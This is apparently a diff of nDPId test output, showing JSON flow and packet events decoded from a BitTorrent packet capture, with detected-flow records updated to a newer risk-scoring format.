 00696{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":53,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1455469975393,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":236,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":236,"pkt_l4_len":202,"ts_msec":1455469975393,"pkt":"LFbcjDU0xCwDBkn+CABFAADeIplAAEAGAADAqAEDl0j\/o86w6hjbuZVQ\/XvsloAYKDdZaAAAAQEIChncD64AaNAEMTI6dXRfaG9sZXB1bmNoaTRlMTE6dXRfbWV0YWRhdGFpMmU2OnV0X3BleGkxZTEyOnV0X3JlY29tbWVuZGk1ZTEwOnV0X2NvbW1lbnRpNmVlMTM6bWV0YWRhdGFfc2l6ZWkxOTAwOWUxOnBpNDA5NTllNDpyZXFxaTI1NWUxOnYxOTrCtVRvcnJlbnQgTWFjIDEuOC42Njp5b3VyaXA0OpdI\/6NlAAAAAQ8="}
 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":55,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469975407,"flow_last_seen":1455469975407,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"ts_msec":1455469975407,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"120.62.33.241","src_port":52910,"dst_port":39332,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00557{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":55,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1455469975407,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"ts_msec":1455469975407,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4fvZAAEAGAADAqAEDeD4h8c6umaQbpzY0C9TW44AYjjZcRQAAAQEIChncD7sAQ+m5E0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1Bjhq4aGFIV+2F24M="}
-00741{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":55,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469975407,"flow_last_seen":1455469975407,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"ts_msec":1455469975407,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"120.62.33.241","src_port":52910,"dst_port":39332,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}}
+00858{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":55,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469975407,"flow_last_seen":1455469975407,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"ts_msec":1455469975407,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"120.62.33.241","src_port":52910,"dst_port":39332,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":56,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469975622,"flow_last_seen":1455469975622,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"ts_msec":1455469975622,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"79.55.129.22","src_port":52908,"dst_port":12097,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00559{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":56,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1455469975622,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"ts_msec":1455469975622,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4JlBAAEAGAADAqAEDTzeBFs6sL0FM+lulp3q\/xoAYVhCSYwAAAQEIChncEJACXeJGE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1BjsY\/A3YcaePRRY8="}
-00740{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":56,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469975622,"flow_last_seen":1455469975622,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"ts_msec":1455469975622,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"79.55.129.22","src_port":52908,"dst_port":12097,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}}
+00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":56,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469975622,"flow_last_seen":1455469975622,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"ts_msec":1455469975622,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"79.55.129.22","src_port":52908,"dst_port":12097,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}}
 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":59,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469976336,"flow_last_seen":1455469976336,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"ts_msec":1455469976336,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"198.100.146.9","src_port":52915,"dst_port":60163,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00557{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":59,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1455469976336,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"ts_msec":1455469976336,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4SfNAAEAGAADAqAEDxmSSCc6z6wOon+tuBozVl4AYZVEahAAAAQEIChncE1MB8nMrE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1BjlkC3tYvcSfI56Y="}
-00741{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":59,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469976336,"flow_last_seen":1455469976336,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"ts_msec":1455469976336,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"198.100.146.9","src_port":52915,"dst_port":60163,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}}
+00858{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":59,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469976336,"flow_last_seen":1455469976336,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"ts_msec":1455469976336,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"198.100.146.9","src_port":52915,"dst_port":60163,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}}
 00574{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":60,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1455469976513,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":146,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":146,"pkt_l4_len":112,"ts_msec":1455469976513,"pkt":"xCwDBkn+LFbcjDU0CABFEACEZqRAAHYGg6bGZJIJwKgBA+sDzrMGjNWXqJ\/rsoAYAQLT1gAAAQEICgHycz0Z3BNTE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVUMzQ1MC3wokMyLr47j7jk1aEAAADnFABkMTplaTA="}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":61,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469976582,"flow_last_seen":1455469976582,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"ts_msec":1455469976582,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"190.103.195.56","src_port":52914,"dst_port":46633,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00557{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":61,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1455469976582,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"ts_msec":1455469976582,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4BctAAEAGAADAqAEDvmfDOM6ytinSUvXkM6bvoIAY+3dDtgAAAQEIChncFEcAv3iAE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1BjkKv+eYrLs2+ChY="}
-00742{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":61,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469976582,"flow_last_seen":1455469976582,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"ts_msec":1455469976582,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"190.103.195.56","src_port":52914,"dst_port":46633,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}}
+00859{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":61,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469976582,"flow_last_seen":1455469976582,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"ts_msec":1455469976582,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"190.103.195.56","src_port":52914,"dst_port":46633,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}}
 01344{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":62,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":3,"flow_last_seen":1455469976697,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":625,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":625,"pkt_l4_len":591,"ts_msec":1455469976697,"pkt":"xCwDBkn+LFbcjDU0CABFEAJjaOxAAHYGf3\/GZJIJwKgBA+sDzrMGjNXnqJ\/rsoAYAQJs0QAAAQEICgHyc00Z3BQDZTQ6aXB2NDQ6xmSSCTEyOmNvbXBsZXRlX2Fnb2kxZTE6bWQxMTp1cGxvYWRfb25seWkzZTExOmx0X2RvbnRoYXZlaTdlMTI6dXRfaG9sZXB1bmNoaTRlMTE6dXRfbWV0YWRhdGFpMmU2OnV0X3BleGkxZTEwOnV0X2NvbW1lbnRpNmVlMTM6bWV0YWRhdGFfc2l6ZWkxOTAwOWUxOnBpNjAxNjNlNDpyZXFxaTI1NWUxOnYxNTrOvFRvcnJlbnQgMy40LjUyOnlwaTUyOTE1ZTY6eW91cmlwNDpSN80BZQAAAHQFv\/\/3\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/3\/\/\/\/\/\/f\/\/\/\/\/3\/f\/\/\/\/\/\/\/\/\/\/\/\/\/\/v\/\/\/\/\/\/\/\/\/\/7\/\/\/\/\/f\/\/\/\/\/\/\/7\/\/\/\/\/\/\/v\/\/\/9\/\/\/\/\/\/7\/\/\/7\/+7\/\/f\/3\/f\/\/\/\/v\/\/\/\/\/\/\/9\/9\/\/\/\/\/\/\/\/\/\/\/\/\/v\/\/\/\/\/3\/\/\/\/gAAAAAUEAAAClgAAAAUEAAAA6gAAAAUEAAAAugAAAAUEAAAA4AAAAAUEAAABqgAAAAUEAAACZwAAAAUEAAACTwAAAAUEAAAC8gAAAAUEAAABiQAAAAUEAAAB3QAAAAUEAAADdAAAAAUEAAAC\/gAAAAUEAAACJgAAAAUEAAACiAAAAAUEAAACvwAAAAUEAAACeQAAAAUEAAABRQAAAAUEAAACCwAAAAUEAAAAkgAAAAUEAAACdQAAAAUEAAACoAAAAAUEAAAAAQAAAAUEAAAAFAAAAAUEAAADTw=="}
 00574{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":64,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1455469977023,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":147,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":147,"pkt_l4_len":113,"ts_msec":1455469977023,"pkt":"xCwDBkn+LFbcjDU0CABFAACFWMJAAHMGa2W+Z8M4wKgBA7YpzrIzpu+g0lL2KIAYAQKm2wAAAQEICgC\/ehQZ3BRHE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLUJUNzk1MC3xovjV8bH+iIGCHSYAAAEBFABkMTplaTBl"}
 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":67,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469977229,"flow_last_seen":1455469977229,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"ts_msec":1455469977229,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"151.15.48.189","src_port":52917,"dst_port":47001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00559{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":67,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1455469977229,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"ts_msec":1455469977229,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4L\/xAAEAGAADAqAEDlw8wvc61t5l0EJCE2E\/BJoAYIPWJ4gAAAQEIChncFslLXJigE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1Bjv4JZL7rS4V2Vgo="}
-00741{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":67,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469977229,"flow_last_seen":1455469977229,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"ts_msec":1455469977229,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"151.15.48.189","src_port":52917,"dst_port":47001,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}}
+00858{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":67,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469977229,"flow_last_seen":1455469977229,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"ts_msec":1455469977229,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"151.15.48.189","src_port":52917,"dst_port":47001,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}}
 00582{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":68,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1455469977285,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":153,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":153,"pkt_l4_len":119,"ts_msec":1455469977285,"pkt":"xCwDBkn+LFbcjDU0CABFAACLG6xAAHIGY0mXDzC9wKgBA7eZzrXYT8EmdBCQyIAYAQLHiQAAAQEICktcmNgZ3BbJE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVUMzQ1MC3wogWCKk\/sCNEtOuUAAADnFABkMTplaTBlNDppcHY0"}
 01329{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":69,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1455469977324,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":618,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":618,"pkt_l4_len":584,"ts_msec":1455469977324,"pkt":"xCwDBkn+LFbcjDU0CABFAAJcG65AAHIGYXaXDzC9wKgBA7eZzrXYT8F9dBCQyIAZAQKR1gAAAQEICktcmOYZ3BbJNDqXDzC9MTI6Y29tcGxldGVfYWdvaTFlMTptZDExOnVwbG9hZF9vbmx5aTNlMTE6bHRfZG9udGhhdmVpN2UxMjp1dF9ob2xlcHVuY2hpNGUxMTp1dF9tZXRhZGF0YWkyZTY6dXRfcGV4aTFlMTA6dXRfY29tbWVudGk2ZWUxMzptZXRhZGF0YV9zaXplaTE5MDA5ZTE6cGk0NzAwMWU0OnJlcXFpMjU1ZTE6djE1Os68VG9ycmVudCAzLjQuNTI6eXBpNTI5MTdlNjp5b3VyaXA0OlI3zQFlAAAAdAX\/\/\/\/\/\/7\/\/\/\/\/\/\/f\/\/\/\/\/v\/\/\/\/\/\/\/\/\/\/v7\/\/v\/\/\/\/\/u\/\/\/\/\/\/\/\/\/\/\/7\/\/\/\/\/\/\/v\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/37\/\/\/\/\/\/\/\/\/\/f\/\/3\/\/3\/\/\/7\/\/\/\/v\/\/f\/\/\/f\/\/\/3\/\/\/\/\/\/v\/\/f\/\/\/\/\/\/\/\/\/\/\/7\/\/\/\/3\/\/\/+AAAAABQQAAAMOAAAABQQAAAApAAAABQQAAAJ1AAAABQQAAAKiAAAABQQAAADVAAAABQQAAAH3AAAABQQAAANZAAAABQQAAADFAAAABQQAAAN2AAAABQQAAAD5AAAABQQAAAD9AAAABQQAAAL9AAAABQQAAAKRAAAABQQAAAK6AAAABQQAAAC9AAAABQQAAAFxAAAABQQAAAHwAAAABQQAAAJKAAAABQQAAAFDAAAABQQAAAJcAAAABQQAAABWAAAABQQAAALUAAAABQQAAAI2AAAABQQAAAB7"}
 01375{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":72,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1455469977685,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":650,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":650,"pkt_l4_len":616,"ts_msec":1455469977685,"pkt":"xCwDBkn+LFbcjDU0CABFAAJ8WMNAAHMGaW2+Z8M4wKgBA7YpzrIzpu\/x0lL2fIAYAQLBOgAAAQEICgC\/e9sZ3BX+NDppcHY0NDq+Z8M4NDppcHY2MTY6IAEAAF71efs4aCApQZg8xzEyOmNvbXBsZXRlX2Fnb2kyZTE6bWQxMTp1cGxvYWRfb25seWkzZTExOmx0X2RvbnRoYXZlaTdlMTI6dXRfaG9sZXB1bmNoaTRlMTE6dXRfbWV0YWRhdGFpMmU2OnV0X3BleGkxZTEwOnV0X2NvbW1lbnRpNmVlMTM6bWV0YWRhdGFfc2l6ZWkxOTAwOWUxOnBpNDY2MzNlNDpyZXFxaTI1NWUxOnYxNjpCaXRUb3JyZW50IDcuOS41Mjp5cGk1MjkxNGU2OnlvdXJpcDQ6UjfNAWUAAAB0Bf\/\/\/\/\/X\/\/\/v\/\/\/\/\/\/\/\/\/\/+\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/f+\/\/\/7\/\/\/\/v\/\/\/\/\/99\/\/+\/\/\/\/\/\/\/\/\/\/\/\/3\/\/\/\/\/\/\/\/\/\/\/\/\/\/+7\/\/3\/\/\/\/\/\/+\/\/\/\/\/\/\/\/\/\/\/77\/\/\/f\/\/\/3\/3f\/3\/\/\/\/\/\/\/v\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/4AAAAAFBAAAApsAAAAFBAAAAk8AAAAFBAAAAtoAAAAFBAAAAWUAAAAFBAAAAxcAAAAFBAAAAVIAAAAFBAAAAsoAAAAFBAAAASUAAAAFBAAAADsAAAAFBAAAAOgAAAAFBAAAAg0AAAAFBAAAArAAAAAFBAAAApUAAAAFBAAAAtYAAAAFBAAAAIEAAAAFBAAAAQkAAAAFBAAAAugAAAAFBAAAAhEAAAAFBAAAAUwAAAAFBAAAAiIAAAAFBAAAAPMAAAAFBAAAAbAAAAAFBAAAACQAAAAFBAAAACI="}
 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":77,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469978413,"flow_last_seen":1455469978413,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"ts_msec":1455469978413,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"95.234.159.16","src_port":52921,"dst_port":41205,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00557{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":77,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1455469978413,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"ts_msec":1455469978413,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4DnNAAEAGAADAqAEDX+qfEM65oPXUDpz5ZKj0loAYkUPBEAAAAQEIChncG14CELSbE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1BjvUWScco35PygrU="}
-00741{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":77,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469978413,"flow_last_seen":1455469978413,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"ts_msec":1455469978413,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"95.234.159.16","src_port":52921,"dst_port":41205,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}}
+00858{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":77,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469978413,"flow_last_seen":1455469978413,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"ts_msec":1455469978413,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"95.234.159.16","src_port":52921,"dst_port":41205,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}}
 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":78,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469978422,"flow_last_seen":1455469978422,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"ts_msec":1455469978422,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"95.237.193.34","src_port":52922,"dst_port":11321,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
